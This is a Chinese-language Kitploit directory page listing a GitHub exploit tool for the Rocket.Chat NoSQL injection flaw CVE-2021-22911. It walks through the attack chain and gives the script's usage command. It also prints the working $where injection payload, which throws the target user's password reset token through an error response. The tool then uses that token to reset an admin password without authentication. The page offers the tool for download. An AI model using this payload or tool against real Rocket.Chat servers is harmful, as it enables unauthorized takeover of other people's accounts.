Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
RocketChat-NoSQLi-Chain-CVE-2021-22911 — 自动利用 Rocket.Chat NoSQL 注入漏洞(CVE-2021-22911)的工具,可泄露密码重置令牌并执行未认证的账户接管。 | Kitploit
工具/GitHubGitHub/tenebrae93/rocketchat-nosqli-chain-cve-2021-22911
密码攻击漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队
GitHubtenebrae93/rocketchat-nosqli-chain-cve-2021-22911

RocketChat-NoSQLi-Chain-CVE-2021-22911

自动利用 Rocket.Chat NoSQL 注入漏洞(CVE-2021-22911)的工具,可泄露密码重置令牌并执行未认证的账户接管。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
16个月前尚未审核

Rocket.Chat NoSQL注入令牌泄露与密码重置

一个针对 Rocket.Chat(及基于 Meteor 的应用程序)的自动利用脚本,利用 NoSQL 注入 通过 $where 子句中的服务器端异常泄露密码重置令牌。一旦令牌泄露,脚本将执行未经身份验证的密码重置。

漏洞概览

  1. 身份验证:脚本以标准用户身份认证,以访问 /api/v1/users.list 端点。

  2. NoSQL 注入:它使用 query 参数注入 $where JavaScript 子句。

  3. 数据窃取:通过在注入中使用 throw 语句,强制服务器返回包含目标用户密码重置令牌的“未捕获异常”错误。

  4. 账户接管:脚本使用泄露的令牌调用 resetPassword,更改目标账户的密码。

用法

先决条件

  • Python 3.x

  • requests 库

Bash

root@kitploit:~
pip install requests

执行

Bash

root@kitploit:~
python3 exploit.py --url http://<TARGET_IP>:3000\
                   -u <YOUR_USER>\
                   -p <YOUR_PASS>\
                   -a <TARGET_ADMIN_USER>\
                   -ap <NEW_ADMIN_PASSWORD>

命令行参数

利用链详解

利用的核心是注入字符串:

JavaScript

root@kitploit:~
{"$where":"this.username==='admin' && (()=>{ throw this.services.password.reset.token })()"}

当服务器处理该请求时,数据库引擎执行匿名函数,在 throw 处崩溃,应用程序捕获异常,无意中将 secret 令牌返回给用户(包含在 JSON 错误响应中)。

下载工具
参数长标志描述
-u--user你的有效用户名或邮箱,用于初始认证。
-p--password你的有效密码。
-a--admin你想要重置密码的账户用户名。
-ap--admin-pass要为管理员账户设置的新密码。
--urlRocket.Chat 实例的基础 URL。